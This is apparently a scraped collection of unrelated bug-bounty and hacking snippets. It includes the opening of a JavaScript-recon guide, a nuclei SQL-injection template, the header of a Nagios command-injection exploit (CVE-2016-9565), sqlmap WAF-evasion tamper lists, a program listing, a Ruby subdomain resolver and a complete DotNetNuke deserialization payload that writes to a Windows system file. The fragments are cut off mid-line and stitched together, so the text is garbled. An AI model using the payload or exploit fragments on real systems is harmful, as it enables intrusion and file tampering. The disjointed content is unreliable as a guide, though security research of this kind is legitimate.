This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
id: SQLInjection_ERROR | |
info: | |
name: SQLINJECTION Detection | |
author: 0x240x23elu & OFJAAAH | |
severity: High | |
requests: | |
- method: GET |
#!/usr/bin/env python | |
intro = """\033[94m | |
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565) | |
nagios_cmd_injection.py ver. 1.0 | |
Discovered & Coded by: | |
Dawid Golunski | |
https://legalhackers.com | |
\033[0m |
# All scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
``` | |
# General scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
``` | |
# Microsoft access | |
``` |
[ | |
{ | |
"program_name": "(ISC)²", | |
"policy_url": "https://bugcrowd.com/isc2", | |
"submission_url": "https://bugcrowd.com/isc2/report", | |
"launch_date": "", | |
"bug_bounty": false, | |
"swag": false, | |
"hall_of_fame": true, | |
"safe_harbor": "partial" |
" _ _ " | |
" _ /|| . . ||\ _ " | |
" ( } \||D ' ' ' C||/ { % " | |
" | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
" |_\_ |----| |----| _/_|" | |
" | |/ | | | | \| |" | |
" | /_ | | | | _\ |" | |
It is all fun and games until someone gets hacked! |
14 apple.com | |
40 vk.com | |
44 github.com | |
49 tumblr.com | |
55 dropbox.com | |
85 medium.com | |
87 paypal.com | |
92 icloud.com | |
100 booking.com | |
112 weebly.com |
#Tool based on a resolver.rb by @melvinsh | |
#Original Repository: https://github.com/melvinsh/subresolve | |
#Modified by @ehsahil for Personal Use. | |
require 'socket' | |
require 'colorize' | |
begin | |
file = File.open(ARGV[0], "r") | |
rescue | |
puts "Usage: ruby recon.rb wordlist" |
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile> |